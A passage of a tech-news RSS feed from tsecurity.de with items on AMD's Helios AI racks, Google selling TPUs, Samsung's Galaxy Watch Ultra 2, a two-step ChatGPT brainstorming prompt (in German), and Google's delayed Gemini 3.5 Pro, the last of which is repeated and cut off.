<p class="wp-block-paragraph">As such, Pensando networking has become central to AMD’s roadmap. Helios can connect each MI455X to as many as three 800Gbps Vulcano AI NICs, while Salina DPUs handle front-end networking and infrastructure services.</p>



<p class="wp-block-paragraph">On the software side, which is an equally critical component, AMD also introduced ROCm.AI, an AI-assisted development layer due to arrive in August. It includes reusable skills for coding agents, simplified management and Hyperloom, which can profile workloads, tune serving configurations, modify kernels and validate results.</p>



<p class="wp-block-paragraph">These tools address two persistent AMD challenges: developer efficiency and ease of use, and software tuning. Automated optimization still has to produce repeatable gains without creating hard-to-maintain code, however. And while ROCm has progressed significantly over the last few years, NVIDIA’s CUDA retains an advantage in maturity, tooling and developer familiarity.</p>



<h2 class="wp-block-heading">Customer commitments underscore rack-scale confidence</h2>



<p class="wp-block-paragraph">AMD now has commitments that give its MI450 generation and Helios considerably more weight. Meta and OpenAI have announced multi-generation agreements composed of up to 6GW of AMD compute capacity, with initial 1GW deployments planned for the second half of 2026.</p>



<p class="wp-block-paragraph">Oracle plans a 50,000-GPU public cloud cluster beginning in the third quarter, while Microsoft will deploy Helios for Azure AI inference. Finally, just before the AMD event, <a href="https://ir.amd.com/news-events/press-releases/detail/1292/amd-and-anthropic-announce-strategic-partnership-to-deploy-up-to-2-gigawatts-of-amd-instinct-mi450-series-gpus" target="_blank" rel="noreferrer noopener">Anthropic announced</a> a strategic partnership for up to 2 Gigawatts of AMD-fueled AI compute, with its first gigawatt expected online in the first half of 2027.</p>



<p class="wp-block-paragraph">Commitments of this scale reflect confidence in more than just MI455X performance. These customers are evaluating the complete architecture, including Venice CPUs, Pensando networking, ROCm software, rack integration, serviceability and AMD’s ability to deliver and execute across multiple product generations.</p>



<p class="wp-block-paragraph">There is some financial alignment behind the agreements as well. AMD issued OpenAI performance-based warrants and committed to investing up to $5 billion in Anthropic. That context matters when evaluating these deals as market validation, but these planned deployments are substantial nonetheless and put Helios on a much stronger foundation as it begins shipping.</p>



<h2 class="wp-block-heading">AMD expands its robotics and embedded foundation</h2>



<p class="wp-block-paragraph">AMD also expanded its physical AI portfolio, building on credible traction from its Xilinx-derived Kria adaptive system-on-modules and embedded technologies that are already powering robotics, machine vision and industrial automation applications.</p>



<p class="wp-block-paragraph">The new Ryzen AI Embedded X100 combines up to 16 Zen 5 CPU cores, integrated Radeon graphics, a second-generation NPU and as much as 128GB of unified LPDDR5X memory shared across its compute engines. To me this looks a lot like a repackaging and optimization of the company’s Strix Halo platform, but with specific optimizations for the embedded space. Regardless, AMD is pairing X100 with the Kria AI Robotics Developer Platform, which includes a System Module or SOM, and a new Robotics Partner Network spanning hardware, software and platform providers.</p>



<p class="wp-block-paragraph">Samples began shipping in June, with full production expected in the fourth quarter. This broader objective is to give developers a path across AMD x86 CPUs, GPUs, NPUs and FPGAs for real-time autonomous systems, rather than requiring them to assemble those hardware engines and software components independently.</p>



<h2 class="wp-block-heading">Execution for AMD is now the test</h2>



<p class="wp-block-paragraph">AMD has assembled a credible platform for the burgeoning agentic AI market that’s blowing up currently with no signs of stopping. MI455X addresses memory and data movement, Venice handles dense agentic CPU workloads, Pensando networking connects global system resources, and ROCm.AI addresses software complexity. Finally, Helios assembles these components into a true competitive threat for NVIDIA’s latest Vera Rubin platform.</p>



<p class="wp-block-paragraph">AMD’s open architecture may appeal to customers seeking supplier choice, but openness must also translate into reliable deployments, competitive total cost and software that does not require a significant rip-up. NVIDIA enters this cycle with a stronger ecosystem and far more rack-scale deployment experience. The true test will be how easily and reliably customers can integrate, operate and maintain these AMD solutions at scale.</p>



<p class="wp-block-paragraph">As it stands, AMD now has major customers and a clearly defined architecture with systems engineering expertise behind it. Delivering Helios on schedule and showing that its performance claims translate into a real production workload throughput advantage and total cost of ownership gains will determine how much the competitive gap narrows. And of course, this is in a market that is clamoring for ever-more compute resources with a seemingly insatiable demand for AI services and capacity. That’s an environment for big iron success. Now AMD just has to deliver optimized, turnkey AI platforms. This is far easier said than done, but time will soon tell as deployments take shape this year.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.computerworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google has started selling TPUs, but still keeps most for itself]]></title>
<description><![CDATA[Some lucky customers took delivery of their own Tensor Processing Units (TPUs), custom chips developed by Google for AI applications, in the second quarter, company executives disclosed during a call to discuss its latest financial results on Wednesday.



The disclosure comes at a time when ente...]]></description>
<link>https://tsecurity.de/de/3689932/it-security-nachrichten/google-has-started-selling-tpus-but-still-keeps-most-for-itself/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689932/it-security-nachrichten/google-has-started-selling-tpus-but-still-keeps-most-for-itself/</guid>
<pubDate>Thu, 23 Jul 2026 20:13:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Some lucky customers took delivery of their own Tensor Processing Units (<a href="https://www.networkworld.com/article/4093957/what-are-tpus-your-guide-to-tensor-processing-units-and-ai-acceleration.html">TPU</a>s), custom chips developed by Google for AI applications, in the second quarter, company executives disclosed during a call to discuss its latest financial results on Wednesday.</p>



<p class="wp-block-paragraph">The disclosure comes at a time when enterprises are grappling with a global shortage of high-end GPUs that is driving up costs and slowing AI deployment timelines, and even <a href="https://techcrunch.com/2025/11/03/altman-and-nadella-need-more-power-for-ai-but-theyre-not-sure-how-much/" target="_blank" rel="noreferrer noopener">those who have GPUs don’t always have electricity to operate them</a>.</p>



<p class="wp-block-paragraph">“We delivered to customer data centers for the first time in Q2,” said <a href="https://www.linkedin.com/in/anat-a-a334433/" target="_blank" rel="noreferrer noopener">Anat Ashkenazi</a>, CFO of Google’s parent Alphabet, adding that the company had begun to recognize a small amount of revenue from TPU orders, although it expected to recognize more in 2027.</p>



<p class="wp-block-paragraph">Ashkenazi did not name the customers or describe the commercial arrangements, leaving open questions about whether the systems are being deployed by large enterprises, governments, sovereign AI initiatives, or other cloud providers.</p>



<p class="wp-block-paragraph">Until recently, Google’s TPU strategy centered on giving customers access to the chips through Google Cloud, while using the same silicon internally to power its own AI models and services. But during the company’s last earnings call in April, just days after it <a href="https://www.networkworld.com/article/4162004/google-bets-on-workload-specific-tpus-with-8t-and-8i-launch.html">released two new TPU models</a>, CEO <a href="https://blog.google/authors/sundar-pichai/" target="_blank" rel="noreferrer noopener">Sundar Pichai</a> said Google would consider selling TPUs to AI labs, capital markets firms, and high-performance computing applications.</p>



<p class="wp-block-paragraph">On Wednesday’s call, Pichai said Google will scale up TPU sales “based on the opportunities we see and the demand we see, commensurate with the constraints that exist and the allocation needs we have for frontier model development.”</p>



<p class="wp-block-paragraph">But Google is still keeping the bulk of its TPUs for itself, either for internal use or to rent out through Google Cloud Platform.</p>



<p class="wp-block-paragraph">“Our first priority is making sure we are allocating what we need to compete at the frontier in terms of AGI development,” Pichai said on Wednesday’s call. “We are using both TPUs and GPUs mainly for serving our models.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Samsung Galaxy Watch Ultra 2 ist die Smartwatch für echte Abenteurer]]></title>
<description><![CDATA[Nach den Leaks vor einigen Tagen hat Samsung nun im Rahmen des „Galaxy Unpacked“-Events die neue Spitzenuhr Galaxy Watch Ultra 2 vorgestellt. Die bislang fortschrittlichste und leistungsstärkste Smartwatch des Unternehmens wurde für besonders anspruchsvolle Nutzer und extreme Abenteuer entwickelt...]]></description>
<link>https://tsecurity.de/de/3689750/it-nachrichten/die-samsung-galaxy-watch-ultra-2-ist-die-smartwatch-fuer-echte-abenteurer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689750/it-nachrichten/die-samsung-galaxy-watch-ultra-2-ist-die-smartwatch-fuer-echte-abenteurer/</guid>
<pubDate>Thu, 23 Jul 2026 18:53:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nach den Leaks vor einigen Tagen hat Samsung nun im Rahmen des <a href="https://www.pcwelt.de/article/3186787/galaxy-unpacked-event-heute-ab-15-uhr-hier-im-live-stream-das-stellt-samsung-alles-vor.html" target="_blank" rel="noreferrer noopener">„Galaxy Unpacked“-Events</a> die neue Spitzenuhr Galaxy Watch Ultra 2 vorgestellt. Die bislang fortschrittlichste und leistungsstärkste Smartwatch des Unternehmens wurde für besonders anspruchsvolle Nutzer und extreme Abenteuer entwickelt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6246cd462dd"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/003-Samsung-Galaxy-Watch-Ultra2-and-Watch9_-Your-Health-Companion-on-the-Wrist-Newsbody.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung Galaxy Watch Ultra 2" class="wp-image-3196895" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Samsung</p></div>



<p>Die Galaxy Watch Ultra 2 ist mit einer Reihe spezieller Tracking-Modi für Outdoor-Sportarten ausgestattet, darunter „Trail Run“ für das Geländelaufen. Dieser Modus erfasst unter anderem Höhenunterschiede und Kletterfortschritte und warnt vor den Auswirkungen des Geländes, um das Verletzungsrisiko zu verringern.</p>



<p>Die Smartwatch ist zudem dank der IP69K-Zertifizierung – der höchstmöglichen IP-Schutzklasse – vollständig tauchfähig. Die Galaxy Watch Ultra 2 kann unter anderem Tauchtiefe, Wassertemperatur und Zeit direkt am Handgelenk erfassen, während Sie sich unter der Wasseroberfläche befinden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6246cd46d7b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/IMG_0819.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung Galaxy Watch Ultra 2 next to the Z Flip 8" class="wp-image-3194664" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<p>Die Uhr überwacht zudem, wie stark Sie beim Laufen schwitzen, und gibt Ihnen Empfehlungen, wann und wie viel Sie trinken sollten, um Ihre Laufziele zu erreichen. Selbstverständlich erfasst die Galaxy Watch Ultra 2 auch andere Gesundheitsdaten.</p>



<p>Die Galaxy Watch Ultra 2 wird von der Snapdragon Elite-Plattform von Qualcomm angetrieben und ist mit 2 GB Arbeitsspeicher sowie 64 GB Speicherplatz ausgestattet. Der Akku der Uhr hat eine Kapazität von 800 mAh und lässt sich in einer halben Stunde auf 40 Prozent schnell aufladen.</p>



<p>Das 1,52 Zoll große Super-AMOLED-Display ist etwas größer als das des Vorgängermodells und verfügt über eine Auflösung von 498 x 498 Pixeln sowie eine maximale Helligkeit von bis zu 5.000 Candela pro Quadratmeter. Das Display mag zwar etwas größer sein, doch die Galaxy Watch Ultra 2 ist dafür 12 Prozent dünner als ihr Vorgängermodell.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6246cd47733"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/IMG_0782.jpg?quality=50&amp;strip=all&amp;w=1200" alt="The health menu on the Samsung Galaxy Watch Ultra 2" class="wp-image-3194655" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Deehan / Foundry</p></div>



<h2 class="wp-block-heading">Preis und Verfügbarkeit</h2>



<p>Die Galaxy Watch Ultra 2 ist in den Farben „Titanium Silver“ und „Titanium Grey“ erhältlich und hat einen empfohlenen Verkaufspreis von 749 Euro. Erhältlich ist sie bereits im <a href="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/watches/galaxy-watch-ultra2/buy/" target="_blank" rel="noreferrer noopener">Samsung-Onlineshop</a> und auch <a href="https://www.amazon.de/Samsung-Galaxy-Ultra2-Smartwatch-Titanium/dp/B0H2D8P46X/?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">bei Amazon</a>.</p>



<p>Neben der Galaxy Watch Ultra 2 hat Samsung auch die neue Galaxy Watch 9 vorgestellt. Mehr dazu lesen Sie hier: <a href="https://www.pcwelt.de/article/3196774/samsung-galaxy-watch-9-praxistest.html" target="_blank" rel="noreferrer noopener">Galaxy Watch 9 im Praxistest: Zwei Dinge, die mir gefallen, und eines, das ich nicht mag</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ich habe ChatGPT um 100 Ideen gebeten: Darum sollten Sie das auch machen]]></title>
<description><![CDATA[Wenn Sie einen KI-Chatbot darum bitten, Namen für einen Podcast, ein WLAN-Netzwerk oder ein kleines Unternehmen zu entwickeln, werden Sie wahrscheinlich eine Liste mit Vorschlägen erhalten, die ein wenig unkreativ ist.



Große Sprachmodelle wie ChatGPT, Claude und Gemini haben kein Problem damit...]]></description>
<link>https://tsecurity.de/de/3689734/windows-tipps/ich-habe-chatgpt-um-100-ideen-gebeten-darum-sollten-sie-das-auch-machen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689734/windows-tipps/ich-habe-chatgpt-um-100-ideen-gebeten-darum-sollten-sie-das-auch-machen/</guid>
<pubDate>Thu, 23 Jul 2026 18:48:59 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Wenn Sie einen KI-Chatbot darum bitten, Namen für einen Podcast, ein WLAN-Netzwerk oder ein kleines Unternehmen zu entwickeln, werden Sie wahrscheinlich eine Liste mit Vorschlägen erhalten, die ein wenig unkreativ ist.</p>



<p>Große Sprachmodelle wie ChatGPT, Claude und Gemini haben kein Problem damit, ein Dutzend Namen für Ihr Lieblingsprojekt oder Ihre Website zu generieren. Aber ein Dutzend Namen zu erhalten, die wirklich vielfältig, einzigartig und einprägsam sind? Das ist deutlich schwieriger – aber dennoch möglich. Sie müssen nur wissen, wie Sie die Modelle auf die richtige Weise in verschiedene Richtungen lenken können.</p>



<p>Bitten Sie ChatGPT zunächst nicht nur um 10 oder 20 Ideen, sondern um 100. Eine <a href="https://mackinstitute.wharton.upenn.edu/wp-content/uploads/2024/02/for-web-AI-idea-variance.pdf">Studie der Wharton School</a> [PDF] legt nahe, dass die Ideen, wenn Sie eine KI um so viele Ideen bitten, umso interessanter werden, je weiter Sie in der Liste nach unten gehen. Dies ist der „Dump“-Teil dieser zweistufigen Prompt-Technik.</p>



<p>In der zweiten Stufe bitten Sie ChatGPT, die Liste zu durchforsten, nach ähnlichen Einträgen zu suchen und diese durch neue zu ersetzen – alles mit dem Ziel, eine möglichst breite und vielfältige Ideensammlung zu schaffen.</p>



<p>Hier ist ein Beispiel für die erste Stufe der Eingabeaufforderung:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Gib mir 100 Ideen zu [Thema X]. Nummeriere diese von 1 bis 100. Gib für jede Idee nur einen kurzen Titel oder Namen an – keine Erklärungen, keine Beschreibungen. Beziehe alles mit ein, auch offensichtliche, schlechte, seltsame oder unausgereifte Antworten. Filtere nicht nach Qualität; das folgt später. Quantität ist das einzige Ziel.</p>
</blockquote>



<p>Sobald die KI ihre Liste geliefert hat, fahren Sie mit der zweiten Phase fort:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Überarbeite nun die Liste im Hinblick auf maximale Vielfalt. Wo immer zwei oder mehr Ideen auf demselben Grundkonzept beruhen, behalte die beste davon bei und ersetze die anderen durch Ideen aus Blickwinkeln, die sonst nirgendwo auf der Liste abgedeckt sind. Das Ziel sind 100 Ideen, bei denen keine zwei auf dasselbe zugrunde liegende Konzept verweisen – sie müssen sich in ihrer Art unterscheiden, nicht nur im Wortlaut.</p>
</blockquote>



<p>Optional können Sie mit einer Eingabe für die dritte Phase fortfahren, die die KI dazu veranlasst, die Liste nach Qualität zu filtern (ich empfehle jedoch, alle 100 Ideen der zweiten Phase selbst durchzugehen):</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Was sind die 10 interessantesten Ideen auf der zweiten Liste?</p>
</blockquote>



<p>Ich habe diese „100-Ideen“-Anweisung (die ich aus einer in der oben genannten Wharton-Studie vorgestellten Anweisungskombination adaptiert habe) für einen lang gehegten Traum ausprobiert: die Eröffnung meines eigenen Cafés. Eine der größten Hürden ist natürlich die Wahl eines einfallsreichen Namens, also habe ich diese zweistufige Anweisung gestartet.</p>



<p>Ich möchte Sie nicht mit der gesamten Liste der Vorschläge langweilen, die ich erhalten habe. Aber hier sind die ersten 10 aus der ursprünglichen Auswahl:</p>



<ul class="wp-block-list">
<li>The Daily Grind</li>



<li>Bean There</li>



<li>Brewed Awakening</li>



<li>Central Perk</li>



<li>The Coffee House</li>



<li>Morning Cup</li>



<li>Java Junction</li>



<li>Common Grounds</li>



<li>Cup &amp; Bean</li>



<li>The Roasted Bean</li>
</ul>



<p>Dabei kamen die üblichen Verdächtigen heraus, bis hin zum „Central Perk“ aus der Serie <em>Friends</em>. Aber auch einige interessante Wortwitze.</p>



<p>Nach der Aufforderung der zweiten Stufe und der optionalen dritten Stufe („Nenne mir die 10 interessantesten Namen aus der zweiten Liste“) kam ich schließlich auf folgende Ergebnisse:</p>



<ul class="wp-block-list">
<li>Warm Noise</li>



<li>Morning Object</li>



<li>Public Living Room</li>



<li>Moth &amp; Match</li>



<li>Localhost</li>



<li>Borrowed Sugar</li>



<li>Unfinished Sentence</li>



<li>Blue Hour</li>



<li>The Loading Bar</li>



<li>Sunday Weather</li>
</ul>



<p>Das sind wirklich ungewöhnliche, unkonventionelle Ideen für den Namen meines zukünftigen Cafés. Einige davon sind ein wenig techniklastig („Localhost“) oder einfach nur seltsam („Morning Object“), andere hingegen haben meine Aufmerksamkeit geweckt. „Blue Hour“ und „Borrowed Sugar“ gefallen mir tatsächlich sehr gut.</p>



<p>Probieren Sie diese zweistufige „100-Ideen“-Übung doch einmal aus, wenn Sie das nächste Mal Ideen benötigen. Selbst wenn dabei nicht gleich der perfekte Name für ein Café, einen Podcast oder einen Blog herauskommt, wird sie zumindest Ihre Kreativität anregen.</p>



<p><a href="https://www.pcwelt.de/article/2806063/so-macht-chatgpt-ihren-alltag-spuerbar-leichter-16-aufgaben-rasch-erledigen-lassen.html" target="_blank" rel="noreferrer noopener">ChatGPT im Alltag – 16 lästige Aufgaben, die KI für Sie erledigen kann</a></p>



<p><a href="https://www.pcwelt.de/article/3183744/hoeren-sie-auf-chatgpt-ihre-texte-schreiben-zu-lassen-versuchen-sie-das-stattdessen.html" target="_blank" rel="noreferrer noopener">Hören Sie auf, ChatGPT Ihre Texte schreiben zu lassen – Versuchen Sie das stattdessen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3689702/ai-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689702/ai-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Thu, 23 Jul 2026 18:38:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3689687/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689687/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Thu, 23 Jul 2026 18:35:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



